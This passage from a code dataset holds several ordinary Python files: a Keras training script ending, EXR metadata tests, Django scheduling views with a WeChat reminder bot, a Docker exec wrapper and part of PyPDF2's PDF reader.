mask=None): \n uit = K.tanh(K.bias_add(K.dot(x, self.W), self.b))\n ait = K.exp(K.squeeze(K.dot(uit, self.u), -1))\n \n if mask is not None:\n # Cast the mask to floatX to avoid float64 upcasting\n ait *= K.cast(mask, K.floatx())\n ait /= K.cast(K.sum(ait, axis=1, keepdims=True) + K.epsilon(), K.floatx())\n \n # weight each timestep by its attention score and sum over the time axis\n weighted_input = x * K.expand_dims(ait)\n output = K.sum(weighted_input, axis=1)\n\n return output\n\n def compute_output_shape(self, input_shape):\n return input_shape[0], input_shape[-1]\n\nif __name__ == \"__main__\":\n try:\n with CustomObjectScope({'HierarchicalAttentionNetwork': HierarchicalAttentionNetwork}):\n model = load_model(saved_model)\n hist = model.fit(X_train, y_train, validation_data=(X_val, y_val),\n batch_size=batch_size, epochs=1)\n X_train = None\n X_val = None\n y_train = None\n y_val = None\n gc.collect()\n model.save(os.path.join(model_dir, 'model.{}.hdf5'.format(epoch)))\n with open(os.path.join(model_dir, 'history.{}.pkl'.format(epoch)), 'wb') as outfile:\n pickle.dump(hist.history, outfile)\n except Exception as e:\n # Write out an error file. 
This will be returned as the failureReason in the\n # DescribeTrainingJob result.\n trc = traceback.format_exc()\n with open(os.path.join(output_dir, 'failure'), 'w') as s:\n s.write('Exception during training: ' + str(e) + '\\n' + trc)\n # Printing this causes the exception to be in the training job logs, as well.\n print('Exception during training: ' + str(e) + '\\n' + trc, file=sys.stderr)\n # A non-zero exit code causes the training job to be marked as Failed.\n sys.exit(255)\n\n sys.exit(0)\n","sub_path":"aws_train/train_resume.py","file_name":"train_resume.py","file_ext":"py","file_size_in_byte":5115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"376975526","text":"#-*- coding: utf-8 -*-\nimport pytest\nimport sys\nimport os\n\n# Append the required module\n# Not the best way but it works in Python 2.7\nsys.path.append(\n os.path.join(os.path.abspath(os.path.dirname(__file__)), '..', 'src'))\n\nimport parse_metadata\n\nEXR_IMAGES_DIR_PATH = os.path.join(\n os.path.abspath(os.path.dirname(__file__)), 'openexr-images')\n\n\nclass TestEXRParsing:\n\n rec709_test_image_path = os.path.join(EXR_IMAGES_DIR_PATH, 'Chromaticities',\n 'Rec709.exr')\n\n def test_oserror_thrown_if_file_does_not_exist(self):\n\n exr_path = 'pippo.exr'\n\n with pytest.raises(OSError):\n parse_metadata.read_exr_header(exr_path)\n\n def test_exr_meta_lineOrder(self):\n\n metadata = parse_metadata.read_exr_header(self.rec709_test_image_path)\n assert metadata['lineOrder'] == 'INCREASING_Y'\n\n def test_exr_meta_compression(self):\n\n metadata = parse_metadata.read_exr_header(self.rec709_test_image_path)\n assert metadata['compression'] == 'PIZ_COMPRESSION'\n\n def test_exr_meta_pixelAspectRatio(self):\n\n metadata = parse_metadata.read_exr_header(self.rec709_test_image_path)\n assert metadata['pixelAspectRatio'] == 1\n\n def test_exr_meta_owner(self):\n\n metadata = parse_metadata.read_exr_header(self.rec709_test_image_path)\n assert metadata['owner'] == 'Copyright 2006 Industrial Light & Magic'\n","sub_path":"tests/test_exr.py","file_name":"test_exr.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"11438767","text":"from modeltranslation.translator import translator, TranslationOptions\nfrom .models import Menu, Slider, SubMenu, Context, Personal\nfrom .models import ArticleContext, Gallery, Images\n\n\nclass MenuTranslationOptions(TranslationOptions):\n fields = ('name', 'slug', 'data',)\n\n\nclass SliderTranslationOptions(TranslationOptions):\n fields = ('slider_text',)\n\n\nclass SubMenuTranslationOptions(TranslationOptions):\n fields = ('slug', 'title', 'title2', 'title3',\n 'data', 'data2', 'data3',)\n\n\nclass ContextTranslationOptions(TranslationOptions):\n fields = ('title', 'title2', 'title3', 'title4',\n 'text', 'text2',)\n\n\nclass PersonalTranslationOptions(TranslationOptions):\n fields = ('name', 'prof', 'info')\n\n\nclass ArticleContextTranslationOptions(TranslationOptions):\n fields = ('title', 'title2', 'title3', 'title4',\n 'text1', 'text2', 'text3', 'text4', 'text5',)\n\n\n# class GalleryTranslationOptions(TranslationOptions):\n# fields = ('text',)\n#\n#\n# class ImagesTranslationOptions(TranslationOptions):\n# fields = ('image_text',)\n\ntranslator.register(Menu, MenuTranslationOptions)\ntranslator.register(Slider, SliderTranslationOptions)\ntranslator.register(SubMenu, SubMenuTranslationOptions)\ntranslator.register(Context, 
ContextTranslationOptions)\ntranslator.register(Personal, PersonalTranslationOptions)\ntranslator.register(ArticleContext, ArticleContextTranslationOptions)\n# translator.register(Gallery, GalleryTranslationOptions)\n# translator.register(Images, ImagesTranslationOptions)\n","sub_path":"mainapp/translation.py","file_name":"translation.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"274719704","text":"\"\"\"\"\"\"\n\n# Standard library modules.\nimport re\nfrom distutils.version import LooseVersion\n\n# Third party modules.\nfrom bs4 import BeautifulSoup\n\n# Local modules.\nfrom pymontecarlo_debian.core.versionparser import \\\n WebpageVersionParser, PackageCloudVersionParser\n\n# Globals and constants variables.\n\nWEBPAGE_URL = 'http://montecarlomodeling.mcgill.ca/download/download.html'\n\nclass MCXrayWebpageVersionParser(WebpageVersionParser):\n\n PATTERN = r'MCXRayLite_v([0-9.]*).zip$'\n\n def __init__(self):\n super().__init__(WEBPAGE_URL)\n\n def _parse_webpage(self, content):\n soup = BeautifulSoup(content, \"html.parser\")\n\n versions = []\n for a in soup.find_all('a'):\n match = re.match(self.PATTERN, a['href'])\n if not match:\n continue\n\n version = LooseVersion(match.group(1))\n\n versions.append(version)\n\n if not versions:\n return None\n\n return max(versions)\n\nclass MCXrayPackageCloudVersionParser(PackageCloudVersionParser):\n\n def __init__(self, api_token):\n super().__init__(api_token, 'ppinard', 'pymontecarlo', 'mcxray-lite')\n","sub_path":"pymontecarlo_debian/mcxray/versionparser.py","file_name":"versionparser.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"395832776","text":"from django.shortcuts import render, redirect, reverse\nfrom User.dataoper import *\nfrom Schedule.models import *\nfrom django.contrib.auth.decorators import login_required\nimport datetime\nimport schedule\nimport time\nimport threading\n# Create your views here.\nfrom django.http import HttpResponse\n\nimport itchat\nfrom itchat.content import TEXT\nfrom itchat import send\nimport json\n\n\ndef index(request):\n return render(request, 'User/index.html')\n\n\ndef login_view(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n if request.GET.get('next', '') == '':\n return redirect('userprofile', username=username)\n else:\n return redirect(request.GET.get('next', ''))\n return render(request, 'User/login.html', {'Logstatus': 'False'})\n else:\n return render(request, 'User/login.html')\n\n\ndef register(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n email = request.POST.get('email')\n res = create_user(username, password, email)\n if res is not None:\n return redirect('userprofile', username=username)\n else:\n return render(request, 'User/register.html', {'Regstatus': 'False'})\n else:\n return render(request, 'User/register.html')\n\n\n@login_required\ndef userprofile(request, username):\n if username != request.user.username:\n return redirect('userprofile', username=request.user.username)\n if request.method == 'GET':\n user_sche = Schedule.objects.filter(creator=request.user)\n unitlist = schedule_list_to_dict(user_sche)\n 
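# Fold in schedules where this user is only a participant as one extra unit\n # (add_participate_unit is assumed to come from the User.dataoper star import).\n 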
part_data = add_participate_unit(ScheduleParticipator.objects.filter(participator=request.user))\n if len(part_data['itemlist']) > 0:\n unitlist.append(part_data)\n return render(request, 'User/userprofile.html', {'unitlist': unitlist, 'username': request.user.username})\n elif request.method == 'POST':\n oper = request.POST.get('operation')\n pk = request.POST.get('pk')\n if oper == 'Delete':\n if Schedule.objects.get(pk=pk).creator == request.user:\n part_list = ScheduleParticipator.objects.filter(schedule=Schedule.objects.get(pk=pk))\n for i in part_list:\n i.delete()\n Schedule.objects.get(pk=pk).delete()\n else:\n ScheduleParticipator.objects.get(participator=GyroUser.objects.get(username=request.user.username),\n schedule=Schedule.objects.get(pk=pk)).delete()\n return redirect('userprofile', username=request.user.username)\n\n\ndef scheduleprofile(request, schedulepk):\n if request.method == 'GET':\n obj_sche = Schedule.objects.get(pk=schedulepk)\n context = {'title': obj_sche.title, 'desc': obj_sche.description, 'notify_time_day': obj_sche.notify_time.days,\n 'start_time': obj_sche.start_time,\n 'end_time': obj_sche.end_time, 'participator_count': obj_sche.participator_count,\n 'type': obj_sche.type}\n return render(request, 'User/new_schedule.html', context)\n elif request.method == 'POST':\n oper = request.POST.get('operation')\n pk = request.POST.get('pk')\n if oper == 'Delete':\n Schedule.objects.get(pk=pk).delete()\n return redirect('userprofile', username=request.user.username)\n elif oper == 'Update':\n title = request.POST.get('title')\n desc = request.POST.get('description')\n notify_time = datetime.timedelta(days=int(request.POST.get('notify_day')), hours=int(request.POST.get('notify_hour')))\n start_time = request.POST.get('start_time')\n end_time = request.POST.get('end_time')\n creator = request.user\n type, _ = ScheduleType.objects.get_or_create(type_name=request.POST.get('type_name')) # get_or_create returns an (object, created) tuple\n sche = Schedule.objects.get(pk=pk)\n sche.title = title\n sche.description = desc\n sche.notify_time = notify_time\n sche.start_time = start_time\n sche.end_time = end_time\n sche.type = type\n sche.save()\n return redirect('userprofile', username=request.user.username)\n\n\ndef create_schedule(request, username):\n if request.method == 'GET':\n return render(request, 'User/new_schedule.html')\n else:\n title = request.POST.get('title')\n desc = request.POST.get('description')\n notify_time = datetime.timedelta(days=int(request.POST.get('notify_day')),\n hours=int(request.POST.get('notify_hour')))\n start_time = request.POST.get('start_time')\n end_time = request.POST.get('end_time')\n creator = request.user\n type, _ = ScheduleType.objects.get_or_create(type_name=request.POST.get('type_name')) # avoid creating duplicate type rows\n Schedule.objects.create(title=title, description=desc, notify_time=notify_time,\n start_time=start_time,\n end_time=end_time, creator=creator, type=type)\n return redirect('userprofile', username=username)\n\n\n@login_required\ndef login_out(request):\n logout(request)\n return redirect('index')\n\n\ndef setting(request, username):\n if request.method == 'GET':\n context = {'username': request.user.username, 'gender': 'Male' if request.user.gender else 'Female',\n 'birthday': request.user.birthday}\n return render(request, 'User/setting.html', context)\n else:\n username = request.POST.get('username')\n password = request.POST.get('password')\n gender = request.POST.get('gender')\n birthday = request.POST.get('birthday')\n userobj = GyroUser.objects.get(username=request.user.username)\n # Only update the password when the form actually submitted a new one.\n if 
password != '':\n userobj.set_password(password)\n userobj.gender = (gender == 'Male') # gender arrives as text; assumes the form posts 'Male'/'Female'\n userobj.birthday = birthday\n userobj.save()\n context = {'username': request.user.username, 'gender': 'Male' if userobj.gender else 'Female',\n 'birthday': birthday}\n return render(request, 'User/setting.html', context)\n\n\n@login_required\ndef search(request):\n if request.method == 'GET':\n searchdata = request.GET.get('q', '')\n if searchdata == '':\n datalist = Schedule.objects.all()\n unitlist = schedule_list_to_dict(datalist)\n return render(request, 'User/search.html', {'unitlist': unitlist, 'username': request.user.username})\n else:\n datalist = Schedule.objects.filter(title__contains=searchdata)\n unitlist = schedule_list_to_dict(datalist)\n return render(request, 'User/search.html', {'unitlist': unitlist, 'username': request.user.username})\n elif request.method == 'POST':\n oper = request.POST.get('operation')\n pk = request.POST.get('pk')\n if oper == 'Add':\n ScheduleParticipator.objects.create(schedule=Schedule.objects.get(pk=pk),\n participator=GyroUser.objects.get(username=request.user.username))\n return redirect('userprofile', username=request.user.username)\n return render(request, 'User/search.html')\n\n\ndef schedule_view(request, schedule_pk):\n print(schedule_pk)\n sche_obj = Schedule.objects.get(pk=schedule_pk)\n if request.method == 'GET':\n title = sche_obj.title\n desc = sche_obj.description\n notify_day = sche_obj.notify_time.days\n start_time = sche_obj.start_time\n end_time = sche_obj.end_time\n creator = request.user.username\n type = sche_obj.type.type_name\n context = {'title': title, 'desc': desc, 'notify_day': notify_day,\n 'start_time': start_time, 'end_time': end_time, 'creator': creator, 'type': type}\n return render(request, 'User/scheduleprofile.html', context)\n else:\n oper = request.POST.get('operation')\n if oper == 'Delete':\n tmp = ScheduleParticipator.objects.filter(schedule=Schedule.objects.get(pk=schedule_pk))\n for i in tmp:\n i.delete()\n Schedule.objects.get(pk=schedule_pk).delete()\n return redirect('userprofile', username=request.user.username)\n elif oper == 'Update':\n title = request.POST.get('title')\n desc = request.POST.get('description')\n notify_time = datetime.timedelta(days=int(request.POST.get('notify_day')),\n hours=int(request.POST.get('notify_hour')))\n start_time = request.POST.get('start_time')\n end_time = request.POST.get('end_time')\n creator = request.user\n type, _ = ScheduleType.objects.get_or_create(type_name=request.POST.get('type_name')) # get_or_create avoids duplicate type rows\n sche = Schedule.objects.get(pk=schedule_pk)\n sche.title = title\n sche.description = desc\n sche.notify_time = notify_time\n sche.start_time = start_time\n sche.end_time = end_time\n sche.type = type\n sche.save()\n return redirect('userprofile', username=request.user.username)\n\n\ndef wechat_module():\n itchat_user_dict = {}\n itchat_user_dict_reverse = {}\n itchat.auto_login(hotReload=False)\n client = itchat.search_friends(nickName='一个亿')[0]['UserName']\n\n @itchat.msg_register(TEXT)\n def text_reply(msg):\n print(msg['FromUserName'])\n if msg['FromUserName'] == client:\n msgdata = json.loads(msg['Text'])\n res = {}\n if msgdata['MessageType'] == 1:\n res['MessageType'] = 1\n res['ToUserName'] = msgdata['FromUserName']\n if authenticate(username=msgdata['User'], password=msgdata['Password']):\n res['AuthenticationResult'] = True\n itchat_user_dict[msgdata['FromUserName']] = msgdata['User']
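\n # Reverse map: username -> WeChat id, used later by the notification job.\n itchat_user_dict_reverse[msgdata['User']] = 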
msgdata['FromUserName']\n else:\n res['AuthenticationResult'] = False\n print(\"Msg to client\")\n print(res)\n send(json.dumps(res), client)\n print(itchat_user_dict)\n elif msgdata['MessageType'] == 2:\n res['MessageType'] = 2\n res['Message'] = \"\"\n res['ToUserName'] = msgdata['FromUserName']\n username = itchat_user_dict[msgdata['FromUserName']]\n user_sche = Schedule.objects.filter(creator=GyroUser.objects.get(username=username))\n unitlist = schedule_list_to_dict(user_sche)\n part_data = add_participate_unit(\n ScheduleParticipator.objects.filter(participator=GyroUser.objects.get(username=username)))\n if len(part_data['itemlist']) > 0:\n unitlist.append(part_data)\n for unit in unitlist:\n res['Message'] += unit['title'] + ':'\n for item in unit['itemlist']:\n res['Message'] += item['title'] + ','\n print(\"Msg to client\")\n print(res)\n send(json.dumps(res), msg['FromUserName'])\n\n def job():\n while True:\n print(\"Gyro Wechat server is working\")\n date_now = datetime.datetime.now().timestamp()\n sche_all = Schedule.objects.all()\n for sche in sche_all:\n if date_now >= (sche.end_time - sche.notify_time).timestamp():\n print('Delete', sche.title, sche.pk)\n res = {'MessageType': 2}\n try:\n res['ToUserName'] = itchat_user_dict_reverse[sche.creator.username]\n except KeyError: # creator has no WeChat session recorded; just clean up\n tmp = ScheduleParticipator.objects.filter(schedule=sche)\n for i in tmp:\n i.delete()\n sche.delete()\n continue\n res['Message'] = '任务提醒:' + sche.title # '任务提醒' means 'task reminder'\n print(\"Msg to client\")\n print(res)\n send(json.dumps(res), client)\n tmp = ScheduleParticipator.objects.filter(schedule=sche)\n for i in tmp:\n i.delete()\n sche.delete()\n time.sleep(10)\n\n def mytime():\n itchat.run()\n\n t = threading.Thread(target=job, name='it')\n v = threading.Thread(target=mytime, name='it1')\n v.start()\n t.start()\n\n#wechat_module()","sub_path":"User/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"9027100","text":"from lib.base import DockerBasePythonAction\n\n\n__all__ = [\n 'DockerExecAction'\n]\n\n\nclass DockerExecAction(DockerBasePythonAction):\n def run(self, *args, **kwargs):\n detach = kwargs.pop('detach')\n execution = self.client.exec_create(*args, **kwargs)\n return self.client.exec_start(exec_id=execution.get('Id'), detach=detach)\n","sub_path":"actions/exec.py","file_name":"exec.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"171325444","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2006, Mathieu Fenniak\n# Copyright (c) 2007, Ashish Kulkarni \n#\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n# * The name of the author may not be used to endorse or promote products\n# derived from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED 
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\nimport struct\nimport sys\nimport warnings\nfrom hashlib import md5\nfrom sys import version_info\n\nfrom PyPDF2 import utils\nfrom PyPDF2._page import PageObject\nfrom PyPDF2._security import _alg33_1, _alg34, _alg35\nfrom PyPDF2.constants import CatalogAttributes as CA\nfrom PyPDF2.constants import Core as CO\nfrom PyPDF2.constants import DocumentInformationAttributes as DI\nfrom PyPDF2.constants import EncryptionDictAttributes as ED\nfrom PyPDF2.constants import PageAttributes as PG\nfrom PyPDF2.constants import PagesAttributes as PA\nfrom PyPDF2.constants import StreamAttributes as SA\nfrom PyPDF2.constants import TrailerKeys as TK\nfrom PyPDF2.errors import PdfReadError, PdfReadWarning, PdfStreamError\nfrom PyPDF2.generic import (\n ArrayObject,\n BooleanObject,\n ByteStringObject,\n Destination,\n DictionaryObject,\n Field,\n IndirectObject,\n NameObject,\n NullObject,\n NumberObject,\n StreamObject,\n TextStringObject,\n createStringObject,\n readNonWhitespace,\n readObject,\n)\nfrom PyPDF2.utils import (\n ConvertFunctionsToVirtualList,\n b_,\n formatWarning,\n isString,\n readUntilWhitespace,\n)\n\nif version_info < (3, 0):\n from cStringIO import StringIO\n\n BytesIO = StringIO\nelse:\n from io import BytesIO, StringIO\n\n\ndef convertToInt(d, size):\n if size > 8:\n raise PdfReadError(\"invalid size in convertToInt\")\n d = b_(\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\") + b_(d)\n d = d[-8:]\n return struct.unpack(\">q\", d)[0]\n\n\nclass DocumentInformation(DictionaryObject):\n \"\"\"\n A class representing the basic document metadata provided in a PDF File.\n This class is accessible through\n :meth:`.getDocumentInfo()`\n\n All text properties of the document metadata have\n *two* properties, eg. author and author_raw. The non-raw property will\n always return a ``TextStringObject``, making it ideal for a case where\n the metadata is being displayed. 
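For example, a report view can simply show ``info.title`` and ``info.author`` and skip values that come back as ``None``. 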
The raw property can sometimes return\n a ``ByteStringObject``, if PyPDF2 was unable to decode the string's\n text encoding; this requires additional safety in the caller and\n therefore is not as commonly accessed.\n \"\"\"\n\n def __init__(self):\n DictionaryObject.__init__(self)\n\n def getText(self, key):\n retval = self.get(key, None)\n if isinstance(retval, TextStringObject):\n return retval\n return None\n\n @property\n def title(self):\n \"\"\"Read-only property accessing the document's **title**.\n Returns a unicode string (``TextStringObject``) or ``None``\n if the title is not specified.\"\"\"\n return (\n self.getText(DI.TITLE) or self.get(DI.TITLE).getObject()\n if self.get(DI.TITLE)\n else None\n )\n\n @property\n def title_raw(self):\n \"\"\"The \"raw\" version of title; can return a ``ByteStringObject``.\"\"\"\n return self.get(DI.TITLE)\n\n @property\n def author(self):\n \"\"\"Read-only property accessing the document's **author**.\n Returns a unicode string (``TextStringObject``) or ``None``\n if the author is not specified.\"\"\"\n return self.getText(DI.AUTHOR)\n\n @property\n def author_raw(self):\n \"\"\"The \"raw\" version of author; can return a ``ByteStringObject``.\"\"\"\n return self.get(DI.AUTHOR)\n\n @property\n def subject(self):\n \"\"\"Read-only property accessing the document's **subject**.\n Returns a unicode string (``TextStringObject``) or ``None``\n if the subject is not specified.\"\"\"\n return self.getText(DI.SUBJECT)\n\n @property\n def subject_raw(self):\n \"\"\"The \"raw\" version of subject; can return a ``ByteStringObject``.\"\"\"\n return self.get(DI.SUBJECT)\n\n @property\n def creator(self):\n \"\"\"Read-only property accessing the document's **creator**. If the\n document was converted to PDF from another format, this is the name of the\n application (e.g. OpenOffice) that created the original document from\n which it was converted. Returns a unicode string (``TextStringObject``)\n or ``None`` if the creator is not specified.\"\"\"\n return self.getText(DI.CREATOR)\n\n @property\n def creator_raw(self):\n \"\"\"The \"raw\" version of creator; can return a ``ByteStringObject``.\"\"\"\n return self.get(DI.CREATOR)\n\n @property\n def producer(self):\n \"\"\"Read-only property accessing the document's **producer**.\n If the document was converted to PDF from another format, this is\n the name of the application (for example, OSX Quartz) that converted\n it to PDF. Returns a unicode string (``TextStringObject``)\n or ``None`` if the producer is not specified.\"\"\"\n return self.getText(DI.PRODUCER)\n\n @property\n def producer_raw(self):\n \"\"\"The \"raw\" version of producer; can return a ``ByteStringObject``.\"\"\"\n return self.get(DI.PRODUCER)\n\n\nclass PdfFileReader(object):\n \"\"\"\n Initialize a PdfFileReader object.\n\n This operation can take some time, as the PDF stream's cross-reference\n tables are read into memory.\n\n :param stream: A File object or an object that supports the standard read\n and seek methods similar to a File object. 
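An in-memory ``io.BytesIO`` buffer works as well, for instance. 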
Could also be a\n string representing a path to a PDF file.\n :param bool strict: Determines whether user should be warned of all\n problems and also causes some correctable problems to be fatal.\n Defaults to ``True``.\n :param warndest: Destination for logging warnings (defaults to\n ``sys.stderr``).\n :param bool overwriteWarnings: Determines whether to override Python's\n ``warnings.py`` module with a custom implementation (defaults to\n ``True``).\n \"\"\"\n\n def __init__(self, stream, strict=True, warndest=None, overwriteWarnings=True):\n if overwriteWarnings:\n # Have to dynamically override the default showwarning since there\n # are no public methods that specify the 'file' parameter\n def _showwarning(\n message, category, filename, lineno, file=warndest, line=None\n ):\n if file is None:\n file = sys.stderr\n try:\n # It is possible for sys.stderr to be defined as None, most commonly in the case that the script\n # is being run via pythonw.exe on Windows. In this case, just swallow the warning.\n # See also https://docs.python.org/3/library/sys.html#sys.__stderr__\n if file is not None:\n file.write(\n formatWarning(message, category, filename, lineno, line)\n )\n except IOError:\n pass\n\n warnings.showwarning = _showwarning\n self.strict = strict\n self.flattenedPages = None\n self.resolvedObjects = {}\n self.xrefIndex = 0\n self._pageId2Num = None # map page IndirectRef number to Page Number\n if hasattr(stream, \"mode\") and \"b\" not in stream.mode:\n warnings.warn(\n \"PdfFileReader stream/file object is not in binary mode. \"\n \"It may not be read correctly.\",\n PdfReadWarning,\n )\n if isString(stream):\n with open(stream, \"rb\") as fileobj:\n stream = BytesIO(b_(fileobj.read()))\n self.read(stream)\n self.stream = stream\n\n self._override_encryption = False\n\n def getDocumentInfo(self):\n \"\"\"\n Retrieve the PDF file's document information dictionary, if it exists.\n Note that some PDF files use metadata streams instead of docinfo\n dictionaries, and these metadata streams will not be accessed by this\n function.\n\n :return: the document information of this PDF file\n :rtype: :class:`DocumentInformation` or\n ``None`` if none exists.\n \"\"\"\n if TK.INFO not in self.trailer:\n return None\n obj = self.trailer[TK.INFO]\n retval = DocumentInformation()\n retval.update(obj)\n return retval\n\n @property\n def documentInfo(self):\n \"\"\"\n Read-only property that accesses the\n :meth:`getDocumentInfo()` function.\n \"\"\"\n return self.getDocumentInfo()\n\n def getXmpMetadata(self):\n \"\"\"\n Retrieve XMP (Extensible Metadata Platform) data from the PDF document\n root.\n\n :return: a :class:`XmpInformation`\n instance that can be used to access XMP metadata from the document.\n :rtype: :class:`XmpInformation` or\n ``None`` if no metadata was found on the document root.\n \"\"\"\n try:\n self._override_encryption = True\n return self.trailer[TK.ROOT].getXmpMetadata()\n finally:\n self._override_encryption = False\n\n @property\n def xmpMetadata(self):\n \"\"\"\n Read-only property that accesses the\n :meth:`getXmpMetadata()` function.\n \"\"\"\n return self.getXmpMetadata()\n\n def getNumPages(self):\n \"\"\"\n Calculates the number of pages in this PDF file.\n\n :return: number of pages\n :rtype: int\n :raises PdfReadError: if file is encrypted and restrictions prevent\n this action.\n \"\"\"\n\n # Flattened pages will not work on an Encrypted PDF;\n # the PDF file's page count is used in this case. 
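That count comes straight from the /Count entry of the root /Pages dictionary, as read below. 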
Otherwise,\n # the original method (flattened page count) is used.\n if self.isEncrypted:\n try:\n self._override_encryption = True\n self.decrypt(\"\")\n return self.trailer[TK.ROOT][\"/Pages\"][\"/Count\"]\n except Exception:\n raise PdfReadError(\"File has not been decrypted\")\n finally:\n self._override_encryption = False\n else:\n if self.flattenedPages is None:\n self._flatten()\n return len(self.flattenedPages)\n\n @property\n def numPages(self):\n \"\"\"\n Read-only property that accesses the\n :meth:`getNumPages()` function.\n \"\"\"\n return self.getNumPages()\n\n def getPage(self, pageNumber):\n \"\"\"\n Retrieves a page by number from this PDF file.\n\n :param int pageNumber: The page number to retrieve\n (pages begin at zero)\n :return: a :class:`PageObject` instance.\n :rtype: :class:`PageObject`\n \"\"\"\n # ensure that we're not trying to access an encrypted PDF\n # assert not self.trailer.has_key(TK.ENCRYPT)\n if self.flattenedPages is None:\n self._flatten()\n return self.flattenedPages[pageNumber]\n\n @property\n def namedDestinations(self):\n \"\"\"\n Read-only property that accesses the\n :meth:`getNamedDestinations()` function.\n \"\"\"\n return self.getNamedDestinations()\n\n # A select group of relevant field attributes. For the complete list,\n # see section 8.6.2 of the PDF 1.7 reference.\n\n def getFields(self, tree=None, retval=None, fileobj=None):\n \"\"\"\n Extracts field data if this PDF contains interactive form fields.\n The *tree* and *retval* parameters are for recursive use.\n\n :param fileobj: A file object (usually a text file) to write\n a report to on all interactive form fields found.\n :return: A dictionary where each key is a field name, and each\n value is a :class:`Field` object. By\n default, the mapping name is used for keys.\n :rtype: dict, or ``None`` if form data could not be located.\n \"\"\"\n field_attributes = {\n \"/FT\": \"Field Type\",\n PA.PARENT: \"Parent\",\n \"/T\": \"Field Name\",\n \"/TU\": \"Alternate Field Name\",\n \"/TM\": \"Mapping Name\",\n \"/Ff\": \"Field Flags\",\n \"/V\": \"Value\",\n \"/DV\": \"Default Value\",\n }\n if retval is None:\n retval = {}\n catalog = self.trailer[TK.ROOT]\n # get the AcroForm tree\n if \"/AcroForm\" in catalog:\n tree = catalog[\"/AcroForm\"]\n else:\n return None\n if tree is None:\n return retval\n\n self._checkKids(tree, retval, fileobj)\n for attr in field_attributes:\n if attr in tree:\n # Tree is a field\n self._buildField(tree, retval, fileobj, field_attributes)\n break\n\n if \"/Fields\" in tree:\n fields = tree[\"/Fields\"]\n for f in fields:\n field = f.getObject()\n self._buildField(field, retval, fileobj, field_attributes)\n\n return retval\n\n def _buildField(self, field, retval, fileobj, fieldAttributes):\n self._checkKids(field, retval, fileobj)\n try:\n key = field[\"/TM\"]\n except KeyError:\n try:\n key = field[\"/T\"]\n except KeyError:\n # Ignore no-name field for now\n return\n if fileobj:\n self._writeField(fileobj, field, fieldAttributes)\n fileobj.write(\"\\n\")\n retval[key] = Field(field)\n\n def _checkKids(self, tree, retval, fileobj):\n if PA.KIDS in tree:\n # recurse down the tree\n for kid in tree[PA.KIDS]:\n self.getFields(kid.getObject(), retval, fileobj)\n\n def _writeField(self, fileobj, field, fieldAttributes):\n order = [\"/TM\", \"/T\", \"/FT\", PA.PARENT, \"/TU\", \"/Ff\", \"/V\", \"/DV\"]\n for attr in order:\n attr_name = fieldAttributes[attr]\n try:\n if attr == \"/FT\":\n # Make the field type value more clear\n types = {\n \"/Btn\": \"Button\",\n 
\"/Tx\": \"Text\",\n \"/Ch\": \"Choice\",\n \"/Sig\": \"Signature\",\n }\n if field[attr] in types:\n fileobj.write(attr_name + \": \" + types[field[attr]] + \"\\n\")\n elif attr == PA.PARENT:\n # Let's just write the name of the parent\n try:\n name = field[PA.PARENT][\"/TM\"]\n except KeyError:\n name = field[PA.PARENT][\"/T\"]\n fileobj.write(attr_name + \": \" + name + \"\\n\")\n else:\n fileobj.write(attr_name + \": \" + str(field[attr]) + \"\\n\")\n except KeyError:\n # Field attribute is N/A or unknown, so don't write anything\n pass\n\n def getFormTextFields(self):\n \"\"\"Retrieves form fields from the document with textual data (inputs, dropdowns)\"\"\"\n # Retrieve document form fields\n formfields = self.getFields()\n if formfields is None:\n return {}\n return {\n formfields[field][\"/T\"]: formfields[field].get(\"/V\")\n for field in formfields\n if formfields[field].get(\"/FT\") == \"/Tx\"\n }\n\n def getNamedDestinations(self, tree=None, retval=None):\n \"\"\"\n Retrieves the named destinations present in the document.\n\n :return: a dictionary which maps names to\n :class:`Destinations`.\n :rtype: dict\n \"\"\"\n if retval is None:\n retval = {}\n catalog = self.trailer[TK.ROOT]\n\n # get the name tree\n if CA.DESTS in catalog:\n tree = catalog[CA.DESTS]\n elif CA.NAMES in catalog:\n names = 